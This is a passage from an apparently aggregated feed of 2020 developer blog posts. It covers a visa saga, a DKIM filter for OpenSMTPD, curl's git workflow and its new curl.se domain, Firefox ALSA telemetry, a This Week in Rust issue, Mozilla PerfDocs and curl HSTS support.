After 889 days since my interview on the embassy (only five days after the answer to the congressman), the embassy contacted me over email. For the first time since that April day in 2018.

Your visa application is still in administrative processing. However, we regret to inform you that because you have missed your travel plans, we will require updated travel plans from you.

My travel plans – that had been out of date for the last 800 days or so – suddenly needed to be updated! As I was already so long into this process and since I feared that giving up now would force me back to square one if I would stop now and re-attempt this again at a later time, I decided to arrange myself some updated travel plans. After all, I work for an American company and I have a friend or two there.

Day 900 – October 2, 2020

I replied to the call for travel plan details with an official invitation letter attached, inviting me to go visit my colleagues at wolfSSL signed by our CEO, Larry. I really want to do this at some point, as I’ve never met most of them so it wasn’t a made up reason. I could possibly even get some other friends to invite me to get the process going but I figured this invite should be enough to keep the ball rolling.

Day 910 – October 13, 2020

I got another email. Now at 910 days since the interview. The embassy asked for my passport “for further processing”.

Day 913 – October 16, 2020

I posted my passport to the US embassy in Stockholm. I also ordered and paid for “return postage” as instructed so that they would ship it back to me in a safe way.

Day 934 – November 6, 2020

At 10:30 in the morning my phone lit up and showed me a text telling me that there’s an incoming parcel being delivered to me, shipped from “the Embassy of the United State” (bonus points for the typo).

Day 937 – November 9, 2020

I received my passport. Inside, there’s a US visa that is valid for ten years, until November 2030.

<figcaption>The upper left corner of the visa page in my passport…</figcaption>

As a bonus, the visa also comes with a NIE (National Interest
Exception) that allows me a single entry to the US during the PP (Presidential Proclamations) – which is restricting travels to the US from the European Schengen zone. In other words: I am actually allowed to travel right away!

The timing is fascinating. The last time I was in the US, Trump hadn’t taken office yet and I get the approved visa in my hands just days after Biden has been announced as the next president of the US.

Will I travel?

Covid-19 is still over us and there’s no end in sight of the pandemic. I will of course not travel to the US or any other country until it can be deemed safe and sensible.

When the pandemic is under control and traveling becomes viable, I am sure there will be opportunities. Hopefully the situation will improve before the visa expires.

Thanks to

All my family and friends, in the US and elsewhere who have supported me and cheered me up through this entire process. Thanks for keeping inviting me to fun things in the US even though I’ve not been able to participate. Thanks for pushing for events to get organized outside of the US! I’m sorry I’ve missed social gatherings, a friend’s marriage and several conference speaking opportunities. Thanks for all the moral support throughout this long journey of madness.

A special thanks go to David (you know who you are) for contacting Gerry Connolly’s office. I honestly think this was the key event that finally made things move in this process.

Wladimir PalantAdding DKIM support to OpenSMTPD with custom filters

If you, like me, are running your own mail server, you might have looked at OpenSMTPD. There are very compelling reasons for that, most important being the configuration simplicity. The following is a working base configuration handling both mail delivery on port 25 as well as mail submissions on port 587:

pki default cert "/etc/mail/default.pem"
pki default key "/etc/mail/default.key"

table local_domains {"example.com", "example.org"}

listen on eth0 tls pki default
listen on eth0 port 587 tls-require pki default auth

action "local" maildir
action "outbound" relay

match from any for domain <local_domains> action "local"
match for local action "local"
match auth from any for any action "outbound"
match from local for any action "outbound"

You might want to add virtual user lists, aliases, SRS support, but it really doesn’t get much more complicated than this. The best practices are all there: no authentication over unencrypted connections, no relaying of mails by unauthorized parties, all of that being very obvious in the configuration. Compare that to Postfix configuration with its multitude of complicated configuration files where I was very much afraid of making a configuration mistake and inadvertently turning my mail server into an open relay.

There is no DKIM support out of the box however, you have to add filters for that. The documentation suggests using opensmtpd-filter-dkimsign that most platforms don’t have prebuilt packages for. So you have to get the source code from some Dutch web server, presumably run by the OpenBSD developer Martijn van Duren. And what you get is a very simplistic DKIM signer, not even capable of supporting multiple domains.

The documentation suggests opensmtpd-filter-rspamd as an alternative which can indeed both sign and verify DKIM signatures. It relies on rspamd however, an anti-spam solution introducing a fair deal of complexity and clearly overdimensioned in my case.

So I went for writing custom filters. With dkimpy implementing all the necessary functionality in Python, how hard could it be?

Getting the code

You can see the complete code along with installation instructions here. It consists of two filters: dkimsign.py should be applied to outgoing mail and will add a DKIM signature, dkimverify.py should be applied to incoming mail and will add an Authentication-Results header indicating whether DKIM and SPF checks were successful. SPF checks are optional and will only be performed if the pyspf module is installed. Both filters rely on the opensmtpd.py module providing a generic filter server implementation.

I have no time to maintain this code beyond what I need myself. This means in particular that I will not test it with any OpenSMTPD versions but the one I run myself (currently 6.6.4). So while it should work with OpenSMTPD 6.7.1, I haven’t actually tested it. Anybody willing to maintain this code is welcome to do so, and I will happily link to their repository.

Why support DKIM?

The DKIM mechanism allows recipients to verify that the email was really sent from the domain listed in the From field, thus helping combat spam and phishing mails. The goals are similar to Sender Policy Framework (SPF), and it’s indeed recommended to use both mechanisms. A positive side-effect: implementing these mechanisms should reduce the likelihood of mails from your server being falsely categorized as spam.

DKIM stands for DomainKeys Identified Mail and relies on public-key cryptography. The domain owner generates a signing key and stores its public part in a special DNS entry for the domain. The private part of the key is then used to sign the body and a subset of headers for each email. The resulting signature is added as DKIM-Signature: header to the email before it is sent out. The receiving mail server can look up the DNS entry and validate the signature.

The OpenSMTPD filter protocol

The protocol used by OpenSMTPD to communicate with its filters is described in the smtpd-filters(7) man page. It is text-based and fairly straightforward: report events and filter requests come in on stdin, filter responses go out on stdout.

So my FilterServer class will read the initial messages from stdin (OpenSMTPD configuration) when it is created. Then the register_handler() method should be called any number of times, which sends out a registration request for a report event or a filter request. And the serve_forever() method will tell OpenSMTD that the filter is ready, read anything coming in on stdin and call the previously registered handlers.

So far very simple, if it weren’t for a tiny complication: when I tried this initially, mail delivery would hang up. Eventually I realized that OpenSMTD didn’t recognize the filter’s response, so it kept waiting for one. Debugging output wasn’t helpful, so it took me a while to figure this one out. A filter response is supposed to contain a session identifier and some opaque token for OpenSMTPD to match it to the correct request. According to documentation, session identifier goes first, but guess what: my slightly older OpenSMTPD version expects the token to go first.

The documentation doesn’t bother mentioning things that used to be different in previous versions of the protocol, a practice that OpenSMTPD developers will hopefully reconsider. And OpenSMTPD doesn’t bother logging filter responses with what it considers an unknown session identifier, as there are apparently legitimate scenarios where a session is removed before the corresponding filter response comes in.

This isn’t the only case where OpenSMTPD flipped parameter order recently. The parameters of the tx-mail report event are listed as message-id result address, yet the order was message-id address result in previous versions apparently. Sadly, not having documentation for the protocol history makes it impossible to tell whether your filter will work correctly with any OpenSMTPD version but the one you tested it with.

Making things more comfortable with session contexts

If one wants to look at the message body, the way to go is registering a handler for the data-line filter. This one will be called for every individual line however. So the handler would have to store previously received lines somewhere until it receives a single dot indicating the end of the message. Complication: this single dot might never come, e.g. if the other side disconnects without finishing the transfer. How does one avoid leaking memory in this case? The previously stored lines have to be removed somehow.

The answer is listening to the link-disconnect report event and clearing out any data associated with the session when it is received. And since all my handlers needed this logic, I added it to the FilterServer class implementation. Calling track_context() during registration phase will register link-connect and link-disconnect handlers, managing session context objects for all handlers. Instead of merely receiving a session identifier, the handlers will receive a context object that they can add more data to as needed.

Allowing higher level message filters

This doesn’t change the fact that data-line filters will typically keep collecting lines until they have a complete message. So I added a register_message_filter() method to FilterServer that will encapsulate this logic. The handler registered here will always be called with a complete list of lines for the message. This method also makes sure that errors during processing won’t prevent the filter from generating a response, the message is rather properly rejected in this case.

Altogether this means that the DKIM signer now looks like this (logic slightly modified here for clarity):

def sign(context, lines):
    message = email.message_from_string('\n'.join(lines))
    domain = extract_sender_domain(message)
    if domain in config:
        signature = dkim_sign(
            '\n'.join(lines).encode('utf-8'),
            config[domain]['selector'],
            domain,
            config[domain]['keydata']
        )
        add_signature(message, signature)
        lines = message.as_string().splitlines(False)
    return lines

server = FilterServer()
server.register_message_filter(sign)
server.serve_forever()

The DKIM verifier is just as simple if you omit the SPF validation logic:

def verify(context, lines):
    dkim_result = 'unknown'
    if 'dkim-signature' in message:
        if dkim_verify('\n'.join(lines).encode('utf-8')):
            dkim_result = 'pass'
        else:
            dkim_result = 'fail'

    message = email.message_from_string('\n'.join(lines))
    if 'authentication-results' in message:
        del message['authentication-results']
    message['Authentication-Results'] = 'localhost; dkim=' + dkim_result
    return message.as_string().splitlines(False)

server = FilterServer()
server.register_message_filter(verify)
server.serve_forever()

Drawbacks

This solution isn’t meant for high-volume servers. It has at least one significant issue: all processing happens sequentially. So while DKIM/SPF checks are being performed (25 seconds for DNS requests in the worst-case scenario) no other mails will be processed. This could be solved by running message filters on a separate thread, but the added complexity simply wasn’t worth the effort for my scenario.

Daniel StenbergThis is how I git

Every now and then I get questions on how to work with git in a smooth way when developing, bug-fixing or extending curl – or how I do it. After all, I work on open source full time which means I have very frequent interactions with git (and GitHub). Simply put, I work with git all day long. Ordinary days, I issue git commands several hundred times.

I have a very simple approach and way of working with git in curl. This is how it works.

command line

I use git almost exclusively from the command line in a terminal. To help me see which branch I’m working in, I have this little bash helper script.

brname () {
  a=$(git rev-parse --abbrev-ref HEAD 2>/dev/null)
  if [ -n "$a" ]; then
    echo " [$a]"
  else
    echo ""
  fi
}
PS1="\u@\h:\w\$(brname)$ "

That gives me a prompt that shows username, host name, the current working directory and the current checked out git branch.

In addition: I use Debian’s bash command line completion for git which is also really handy. It allows me to use tab to complete things like git commands and branch names.

git config

I of course also have my customized ~/.gitconfig file to provide me with some convenient aliases and settings. My most commonly used git aliases are:

st = status --short -uno
ci = commit
ca = commit --amend
caa = commit -a --amend
br = branch
co = checkout
df = diff
lg = log -p --pretty=fuller --abbrev-commit
lgg = log --pretty=fuller --abbrev-commit --stat
up = pull --rebase
latest = log @^{/RELEASE-NOTES:.synced}..

The ‘latest’ one is for listing all changes done to curl since the most recent RELEASE-NOTES “sync”. The others should hopefully be rather self-explanatory.

The config also sets gpgsign = true, enables mailmap and a few other things.

master is clean and working

The main curl development is done in the single curl/curl git repository (primarily hosted on GitHub). We keep the master branch the bleeding edge development tree and we work hard to always keep that working and functional. We do our releases off the master branch when that day comes (every eight weeks) and we provide “daily snapshots” from that branch, put together – yeah – daily.

When merging fixes and features into master, we avoid merge commits and use rebases and fast-forward as much as possible. This makes the branch very easy to browse, understand and work with – as it is 100% linear.

Work on a fix or feature

When I start something new, like work on a bug or trying out someone’s patch or similar, I first create a local branch off master and work in that. That is, I don’t work directly in the master branch. Branches are easy and quick to do and there’s no reason to shy away from having loads of them!

I typically name the branch prefixed with my GitHub user name, so that when I push them to the server it is noticeable who is the creator (and I can use the same branch name locally as I do remotely).

$ git checkout -b bagder/my-new-stuff-or-bugfix

Once I’ve reached somewhere, I commit to the branch. It can then end up one or more commits before I consider myself “done for now” with what I was set out to do.

I try not to leave the tree with any uncommitted changes – like if I take off for the day or even just leave for food or an extended break. This puts the repository in a state that allows me to easily switch over to another branch when I get back – should I feel the need to. Plus, it’s better to commit and explain the change before the break rather than having to recall the details again when coming back.

Never stash

“git stash” is therefore not a command I ever use. I rather create a new branch and commit the (temporary?) work in there as a potential new line of work.

Show it off and get reviews

Yes I am the lead developer of the project but I still maintain the same work flow as everyone else. All changes, except the most minuscule ones, are done as pull requests on GitHub.

When I’m happy with the functionality in my local branch. When the bug seems to be fixed or the feature seems to be doing what it’s supposed to do and the test suite runs fine locally.

I then clean up the commit series with “git rebase -i” (or if it is a single commit I can instead use just “git commit --amend“).

The commit series should be a set of logical changes that are related to this change and not any more than necessary, but kept separate if they are separate. Each commit also gets its own proper commit message. Unrelated changes should be split out into its own separate branch and subsequent separate pull request.

git push origin bagder/my-new-stuff-or-bugfix

Make the push a pull request

On GitHub, I then make the newly pushed branch into a pull request (aka “a PR”). It will then become visible in the list of pull requests on the site for the curl source repository, it will be announced in the #curl IRC channel and everyone who follows the repository on GitHub will be notified accordingly.

Perhaps most importantly, a pull request kicks of a flood of CI jobs that will build and test the code in numerous different combinations and on several platforms, and the results of those tests will trickle in over the coming hours. When I write this, we have around 90 different CI jobs – per pull request – and something like 8 different code analyzers will scrutinize the change to see if there’s any obvious flaws in there.

<figcaption>CI jobs per platform over time. Graph snapped on November 5, 2020</figcaption>

A branch in the actual curl/curl repo

Most contributors who would work on curl would not do like me and make the branch in the curl repository itself, but would rather do them in their own forked version instead. The difference isn’t that big and I could of course also do it that way.

After push, switch branch

As it will take some time to get the full CI results from the PR to come in (generally a few hours), I switch over to the next branch with work on my agenda. On a normal work-day I can easily move over ten different branches, polish them and submit updates in their respective pull-requests.

I can go back to the master branch again with ‘git checkout master‘ and there I can “git pull” to get everything from upstream – like when my fellow developers have pushed stuff in the mean time.

PR comments or CI alerts

If a reviewer or a CI job find a mistake in one of my PRs, that becomes visible on GitHub and I get to work to handle it. To either fix the bug or discuss with the reviewer what the better approach might be.

Unfortunately, flaky CI jobs is a part of life so very often there ends up one or two red markers in the list of CI jobs that can be ignored as the test failures in them are there due to problems in the setup and not because of actual mistakes in the PR…

To get back to my branch for that PR again, I “git checkout bagder/my-new-stuff-or-bugfix“, and fix the issues.

I normally start out by doing follow-up commits that repair the immediate mistake and push them on the branch:

git push origin bagder/my-new-stuff-or-bugfix

If the number of fixup commits gets large, or if the follow-up fixes aren’t small, I usually end up doing a squash to reduce the number of commits into a smaller, simpler set, and then force-push them to the branch.

The reason for that is to make the patch series easy to review, read and understand. When a commit series has too many commits that changes the previous commits, it becomes hard to review.

Ripe to merge?

When the pull request is ripe for merging (independently of who authored it), I switch over to the master branch again and I merge the pull request’s commits into it. In special cases I cherry-pick specific commits from the branch instead. When all the stuff has been yanked into master properly that should be there, I push the changes to the remote.

Usually, and especially if the pull request wasn’t done by me, I also go over the commit messages and polish them somewhat before I push everything. Commit messages should follow our style and mention not only which PR that it closes but also which issue it fixes and properly give credit to the bug reporter and all the helpers – using the right syntax so that our automatic tools can pick them up correctly!

As already mentioned above, I merge fast-forward or rebased into master. No merge commits.

Never merge with GitHub!

There’s a button GitHub that says “rebase and merge” that could theoretically be used for merging pull requests. I never use that (and if I could, I’d disable/hide it). The reasons are simply:

  1. I don’t feel that I have the proper control of the commit message(s)
  2. I can’t select to squash a subset of the commits, only all or nothing
  3. I often want to cleanup the author parts too before push, which the UI doesn’t allow

The downside with not using the merge button is that the message in the PR says “closed by [hash]” instead of “merged in…” which causes confusion to a fair amount of users who don’t realize it means that it actually means the same thing! I consider this is a (long-standing) GitHub UX flaw.

Post merge

If the branch has nothing to be kept around more, I delete the local branch again with “git branch -d [name]” and I remove it remotely too since it was completely merged there’s no reason to keep the work version left.

At any given point in time, I have some 20-30 different local branches alive using this approach so things I work on over time all live in their own branches and also submissions from various people that haven’t been merged into master yet exist in branches of various maturity levels. Out of those local branches, the number of concurrent pull requests I have in progress can be somewhere between just a few up to ten, twelve something.

RELEASE-NOTES

Not strictly related, but in order to keep interested people informed about what’s happening in the tree, we sync the RELEASE-NOTES file every once in a while. Maybe every 5-7 days or so. It thus becomes a file that explains what we’ve worked on since the previous release and it makes it well-maintained and ready by the time the release day comes.

To sync it, all I need to do is:

$ ./scripts/release-notes.pl

Which makes the script add suggested updates to it, so I then load the file into my editor, remove the separation marker and all entries that don’t actually belong there (as the script adds all commits as entries as it can’t judge the importance).

When it looks okay, I run a cleanup round to make it sort it and remove unused references from the file…

$ ./scripts/release-notes.pl cleanup

Then I make sure to get a fresh list of contributors…

$ ./scripts/contributors.sh

… and paste that updated list into the RELEASE-NOTES. Finally, I get refreshed counters for the numbers at the top of the file by running

$ ./scripts/delta

Then I commit the update (which needs to have the commit message RELEASE-NOTES: synced“) and push it to master. Done!

The most up-to-date version of RELEASE-NOTES is then always made available on https://curl.se/dev/release-notes.html

Credits

Picture by me, taken from the passenger seat on a helicopter tour in 2011.

Chris H-CData Science is Hard: ALSA in Firefox

(( We’re overdue for another episode in this series on how Data Science is Hard. Today is a story from 2016 which I think illustrates many important things to do with data. ))

It’s story time. Gather ’round.

In July of 2016, Anthony Jones made the case that the Mozilla-built Firefox for Linux should stop supporting the ALSA backend (and also the WinXP WinMM backend) so that we could innovate on features for more modern audio backends.

(( You don’t need to know what an audio backend is to understand this story. ))

The code supporting ALSA would remain in tree for any Linux distribution who wished to maintain the backend and build it for themselves, but Mozilla would stop shipping Firefox with that code in it.

But how could we ensure the number of Firefoxen relying on this backend was small enough that we wouldn’t be removing something our users desperately needed? Luckily :padenot had just added an audio backend measurement to Telemetry. “We’ll have data soon,” he wrote.

By the end of August we’d heard from Firefox Nightly and Firefox Developer Edition that only 3.5% and 2% (respectively) of Linux subsessions with audio used ALSA. This was small enough to for the removal to move ahead.

Fast-forward to March of 2017. Seven months have passed. The removal has wound its way through Nightly, Developer Edition, Beta, and now into the stable Release channel. Linux users following this update channel update their Firefox and… suddenly the web grows silent for a large number of users.

Bugs are filed (thirteen of them). The mailing list thread with Anthony’s original proposal is revived with some very angry language. It seems as though far more than just a fraction of a fraction of users were using ALSA. There were entire Linux distributions that didn’t ship anything besides ALSA. How did Telemetry miss them?

It turns out that many of those same ALSA-only Linux distributions also turned off Telemetry when they repackaged Firefox for their users. And for any that shipped with Telemetry at all, many users disabled it themselves. Those users’ Firefoxen had no way to phone home to tell Mozilla how important ALSA was to them… and now it was too late.

Those Linux distributions started building ALSA support into their distributed Firefox builds… and hopefully began reporting Telemetry by default to prevent this from happening again. I don’t know if they did for sure (we don’t collect fine-grained information like that because we don’t need it).

But it serves as a cautionary tale: Mozilla can only support a finite number of things. Far fewer now than we did back in 2016. We prioritize what we support based on its simplicity and its reach. That first one we can see for ourselves, and for the second we rely on data collection like Telemetry to tell us.

Counting things is harder than it looks. Counting things that are invisible is damn near impossible. So if you want to be counted: turn Telemetry on (it’s in the Preferences) and leave it on.

:chutten

Cameron KaiserTenFourFox FPR29b1 available

TenFourFox Feature Parity Release 29 beta 1 is now available (downloads, hashes, release notes). Raphaël's JavaScript toggle is back in the Tools menu but actually OlgaTPark gets most of the credit this release for some important backports from mainline Firefox, including fixes to DOM fetch which should improve a number of sites and adding a key combination (Command-Option-R in the default en-US locale) to toggle Reader View. These features require new locale strings, so expect new language packs with this release (tip of the hat to Chris T who maintains them). The usual bug and security fixes apply as well. FPR29 will come out parallel with Firefox 78.5/83 on or about November 17.

The December release may be an SPR only due to the holidays and my work schedule. More about that a little later.

Daniel StenbergThe journey to a curl domain

Good things come to those who wait?

When I created and started hosting the first websites for curl I didn’t care about the URL or domain names used for them, but after a few years I started to think that maybe it would be cool to register a curl domain for its home. By then it was too late to find an available name under a “sensible” top-level domain and since then I’ve been on the lookout for one.

Yeah, I host it

So yes, I’ve administrated every machine that has ever hosted the curl web site going all the way back to the time before we called the tool curl. I’m also doing most of the edits and polish of the web content, even though I’m crap at web stuff like CSS and design. So yeah, I consider it my job to care for the site and make sure it runs smooth and that it has a proper (domain) name.

www.fts.frontec.se

The first ever curl web page was hosted on “www.fts.frontec.se/~dast/curl” in the late 1990s (snapshot). I worked for the company with that domain name at the time and ~dast was the location for my own personal web content.

curl.haxx.nu

The curl website moved to its first “own home”, with curl.haxx.nu in August 1999 (snapshot) when we registered our first domain and the .nu top-level domain was available to us when .se wasn’t.

curl.haxx.se

We switched from curl.haxx.nu to curl.haxx.se in the summer of 2000 (when finally were allowed to register our name in the .se TLD) (snapshot).

The name “haxx” in the domain has been the reason for many discussions and occasional concerns from users and overzealous blocking-scripts over the years. I’ve kept the curl site on that domain since it is the name of one of the primary curl sponsors and partly because I want to teach the world that a particular word in a domain is not a marker for badness or something like that. And of course because we have not bought or been provided a better alternative.

Haxx is still the name of the company I co-founded back in 1997 so I’m also the admin of the domain.

curl.se

I’ve looked for and contacted owners of curl under many different TLDs over the years but most have never responded and none has been open for giving up their domains. I’ve always had an extra attention put on curl.se because it is in the Swedish TLD, the same one we have for Haxx and where I live.

The curling background

The first record on archive.org of anyone using the domain curl.se for web content is dated August 2003 when the Swedish curling team “Härnösands CK” used it. They used the domain and website for a few years under this name. It can be noted that it was team Anette Norberg, which subsequently won two Olympic gold medals in the sport.

In September 2007 the site was renamed, still being about the sport curling but with the name “the curling girls” in Swedish (curlingtjejerna) which remained there for just 1.5 years until it changed again. “curling team Folksam” then populated the site with contents about the sport and that team until they let the domain expire in 2012. (Out of these three different curling oriented sites, the first one is the only one that still seems to be around but now of course on another domain.)

Ads

In early August 2012 the domain was registered to a new owner. I can’t remember why, but I missed the chance to get the domain then.

August 28 2012 marks the first date when curl.se is recorded to suddenly host a bunch of links to casino, bingo and gambling sites. It seems that whoever bought the domain wanted to surf on the good name and possible incoming links built up from the previous owners. For several years this crap was what the website showed. I doubt very many users ever were charmed by the content nor clicked on many links. It was ugly and over-packed with no real content but links and ads.

The last archive.org capture of the ad-filled site was done on October 2nd 2016. Since then, there’s been no web content on the domain that I’ve found. But the domain registration kept getting renewed.

Failed to purchase

In August 2019, I noticed that the domain was about to expire, and I figured it could be a sign that the owner was not too interested in keeping it anymore. I contacted the owner via a registrar and offered to buy it. The single only response I ever got was that my monetary offer was “too low”. I tried to up my bid, but I never got any further responses from the owner and then after a while I noticed that the domain registration was again renewed for another year. I went back to waiting.

Expired again

In September 2020 the domain was again up for expiration and I contacted the owner again, this time asking for a price for which they would be willing to sell the domain. Again no response, but this time the domain actually went all the way to expiry and deletion, which eventually made it available “on the market” for everyone interested to compete for the purchase.

I entered the race with the help of a registrar that would attempt to buy the name when it got released. When this happens, when a domain name is “released”, it becomes a race between all the potential buyers who want the domain. It is a 4-letter domain that is an English word and easy pronounceable. I knew there was a big risk others would also be trying to get it.

In the early morning of October 19th 2020, the curl.se domain was released and in the race of getting the purchase… I lost. Someone else got the domain before me. I was sad. For a while, until I got the good news…

Donated!

It turned out my friend Bartek Tatkowski had snatched the domain! After getting all the administrative things in order, Bartek graciously donated the domain to me and 15:00 on October 30 2020 I could enter my own name servers into the dedicated inputs fields for the domain, and configure it properly in our master and secondary DNS servers.

curl.se is the new home

Starting on November 4, 2020 curl.se is the new official home site for the curl project. The curl.haxx.se name will of course remain working for a long time more and I figure we can basically never shut it down as there are so many references to it spread out over the world. I intend to eventually provide redirects for most things from the old name to the new.

What about a www prefix? The jury is still out how or if we should use that or not. The initial update of the site (November 4) uses a www.curl.se host name in links but I’ve not done any automatic redirects to or from that. As the site is CDNed, and we can’t use CNAMEs on the apex domain (curl.se), we instead use anycast IPs for it – the net difference to users should be zero. (Fastly is a generous sponsor of the curl project.)

I also happen to own libcurl.se since a few years back and I’ll make sure using this name also takes you to the right place.

Why not curl.dev?

People repeatedly ask me. Names in the .dev domains are expensive. Registering curl.dev goes for 400 USD right now. curl.se costs 10 USD/year. I see little to no reason to participate in that business and I don’t think spending donated money on such a venture is a responsible use of our funds.

Credits

Image by truthseeker08 from Pixabay. Domain by Bartek Tatkowski.

This Week In RustThis Week in Rust 363

Hello and welcome to another issue of This Week in Rust! Rust is a systems language pursuing the trifecta: safety, concurrency, and speed. This is a weekly summary of its progress and community. Want something mentioned? Tweet us at @ThisWeekInRust or send us a pull request. Want to get involved? We love contributions.

This Week in Rust is openly developed on GitHub. If you find any errors in this week's issue, please submit a PR.

Updates from Rust Community

No Rust Blog posts this week.

Newsletters
Tooling
Observations/Thoughts
Rust Walkthroughs
Project Updates
Miscellaneous

Crate of the Week

This week's crate is tract from Sonos, a neural network inference library, written purely in Rust for models in ONNX, NNEF and TF formats.

Thanks to Benjamin Minixhofer for the suggestion!

Submit your suggestions and votes for next week!

Call for Participation

Always wanted to contribute to open-source projects but didn't know where to start? Every week we highlight some tasks from the Rust community for you to pick and get started!

Some of these tasks may also have mentors available, visit the task page for more information.

If you are a Rust project owner and are looking for contributors, please submit tasks here.

Updates from Rust Core

374 pull requests were merged in the last week

Rust Compiler Performance Triage

  • 2020-11-03: 0 Regressions, 5 Improvements, 0 mixed

A number of improvements on various benchmarks. The most notable news this week in compiler performance is the progress on instruction metric collection on a per-query level; see measureme#143 for the latest.

Otherwise, this week was an excellent one for performance (though mostly on stress tests and auto-generated test cases rather than commonly seen code).

See the full report for more.

Approved RFCs

Changes to Rust follow the Rust RFC (request for comments) process. These are the RFCs that were approved for implementation this week:

No RFCs were approved this week.

Final Comment Period

Every week the team announces the 'final comment period' for RFCs and key PRs which are reaching a decision. Express your opinions now.

RFCs
Tracking Issues & PRs

New RFCs

Upcoming Events

Online

If you are running a Rust event please add it to the calendar to get it mentioned here. Please remember to add a link to the event too. Email the Rust Community Team for access.

Rust Jobs

Tweet us at @ThisWeekInRust to get your job offers listed here!

Quote of the Week

Like other languages Rust does have footguns. The difference is that we keep ours locked up in the unsafe.

Ted Mielczarek on twitter

Thanks to Nikolai Vazquez for the suggestion.

Please submit quotes and vote for next week!

This Week in Rust is edited by: nellshamrell, llogiq, and cdmistman.

Discuss on r/rust

Mozilla Performance BlogDynamic Test Documentation with PerfDocs

After over twenty years, Mozilla is still going strong. But over that amount of time, there’s bound to be changes in responsibilities. This brings unique challenges with it to test maintenance when original creators leave and knowledge of the purposes, and inner workings of a test possibly disappears. This is especially true when it comes to performance testing.

Our first performance testing framework is Talos, which was built in 2007. It’s a fantastic tool that is still used today for performance testing very specific aspects of Firefox. We currently have 45 different performance tests in Talos, and all of those together produce as many as 462 metrics. Having said that, maintaining the tests themselves is a challenge because some of the people who originally built them are no longer around. In these tests, the last person who touched the code, and who is still around, usually becomes the maintainer of these tests. But with a lack of documentation on the tests themselves, this becomes a difficult task when you consider the possibility of a modification causing a change in what is being measured, and moving away from its original purpose.

Over time, we’ve built another performance testing framework called Raptor which is primarily used for page load testing (e.g. measuring first paint, and first contentful paint). This framework is much simpler to maintain and keep up with its purpose but the settings used for the tests change often enough that it becomes easy to forget how we set up the test, or what pages are being tested exactly. We have a couple other frameworks too, with the newest one (which is still in development) being MozPerftest – there might be a blog post on this in the future. With this many frameworks and tests, it’s easy to see how test maintenance over the long term can turn into a bit of a mess when it’s left unchecked.

To overcome this issue, we decided to implement a tool to dynamically document all of our existing performance tests in a single interface while also being able to prevent new tests from being added without proper documentation or, at the least, an acknowledgement of the existence of the test. We called this tool PerfDocs.

Currently, we use PerfDocs to document tests in Raptor and MozPerftest (with Talos in the plans for the future). At the moment in Raptor, we only document the tests that we have, along with the pages that are being tested. Given that Raptor is a simple framework with the main purpose being to measure page loads, this documentation gives us enough without getting overly complex. However, we do plan to add much more information to it in the future (e.g. what branches the tests run on, what are the test settings).

The PerfDocs integration with MozPerftest is far more interesting though and you can find it here. In MozPerftest, all tests have a mandatory requirement of having metadata in the test itself. For example, here’s a test we have for measuring the start-up time on our mobile browsers which describes things such as the browsers that it runs on, and even the owner of the test. This lets us force the test writer to think about maintainability as we move into the future rather than simply writing it and forgetting it. For that Android VIEW test, you can find the generated documentation here. If you look through the documented tests that we have, you’ll notice that we also don’t have a single person listed as a maintainer. Instead, we refer to the team that built it as the maintainer. Furthermore, the tests actually exist in the folders (or code) that those teams are responsible for so they don’t need to exist in the frameworks folder giving us more accountability for their maintenance. By building tests this way, with documentation in mind, we can ensure that as time goes on, we won’t lose information about what is being tested, its purpose, along with who should be responsible for maintaining it.

Lastly, as I alluded to above, outside of generating documentation dynamically we also ensure that any new tests are properly documented before they are added into mozilla-central. This is done for both Raptor and MozPerftest through a tool called review-bot which runs tests on submitted patches in Phabricator (the code review tool that we use). When a patch is submitted, PerfDocs will run to make sure that (1) all the tests that were documented actually exist, and (2) all the tests which exist are actually documented. This way, we can prevent our documentation from becoming outdated with tests that don’t exist anymore, and that all tests are always documented in some way.

PerfDocs Review Bot Comment

The review-bot left a complaint on this patch which was adding new suites. This one is because we could not find the actual tests.

In the future, we hope to be able to expand this tool and its features from our performance tests to the massive box of functional tests that we have. If you think having 462 metrics to track is a lot, consider the thousands of tests we have for ensuring that Firefox functionality is properly tested.

This project started in Q4 of 2019, with myself [:sparky], and Alexandru Ionescu [:alexandrui] building up the base of this tool. Then, in early H1-2020, Myeongjun Go [:myeongjun], a fantastic volunteer contributor, began hacking on this project and brought us from lightly documenting Raptor tests to having links to the tested pages in it, and even integrating PerfDocs into MozPerftest.

If you have any questions, feel free to reach out to us on Riot in #perftest.

Daniel StenbergHSTS your curl

HTTP Strict Transport Security (HSTS) is a standard HTTP response header for sites to tell the client that for a specified period of time into the future, that host is not to be accessed with plain HTTP but only using HTTPS. Documented in RFC 6797 from 2012.

The idea is of course to reduce the risk for man-in-the-middle attacks when the server resources might be accessible via both HTTP and HTTPS, perhaps due to legacy or just as an upgrade path. Every access to the HTTP version is then a risk that you get back tampered content.

Browsers preload

These headers have been supported by the popular browsers for years already, and they also have a system setup for preloading a set of sites. Sites that exist in their preload list then never get accessed over HTTP since they know of their HSTS state already when the browser is fired up for the first time.

The entire .dev top-level domain is even in that preload list so you can in fact never access a web site on that top-level domain over HTTP with the major browsers.

With the curl tool

Starting in curl 7.74.0, curl has experimental support for HSTS. Experimental means it isn’t enabled by default and we discourage use of it in production. (Scheduled to be released in December 2020.)

You instruct curl to understand HSTS and to load/save a cache with HSTS information using --hsts <filename>. The HSTS cache saved into that file is then updated on exit and if you do repeated invokes with the same cache file, it will effectively avoid clear text HTTP accesses for as long as the HSTS headers tell it.

I envision that users will simply use a small hsts cache file for specific use cases rather than anyone ever really want to have or use a “complete” preload list of domains such as the one the browsers use, as that’s a huge list of sites and for most use cases just completely unnecessary to load and handle.

With libcurl

Possibly, this feature is more useful and appreciated by applications that use libcurl for HTTP(S) transfers. With libcurl the application can set a file name to use for loading and saving the cache but it also gets some added options for more flexibility and powers. Here’s a quick overview:

CURLOPT_HSTS – lets you set a file name to read/write the HSTS cache from/to.

CURLOPT_HSTS_CTRL – enable HSTS functionality for this transfer

CURLOPT_HSTSREADFUNCTION – this callback gets called by libcurl when it is about to start a transfer and lets the application preload HSTS entries – as if they had been read over the wire and been added to the cache.

CURLOPT_HSTSWRITEFUNCTION – this callback gets called repeatedly when libcurl flushes its in-memory cache and allows the application to save the cache somewhere and similar things.

Feedback?

I trust you understand that I’m very very keen on getting feedback on how this works, on the API and your use cases. Both negative and positive. Whatever your thoughts are really!

Data@MozillaThis week in Glean: Glean.js

(“This Week in Glean” is a series of blog posts that the Glean Team at Mozilla is using to try to communicate better about our work. They could be release notes, documentation, hopes, dreams, or whatever: so long as it is inspired by Glean.)

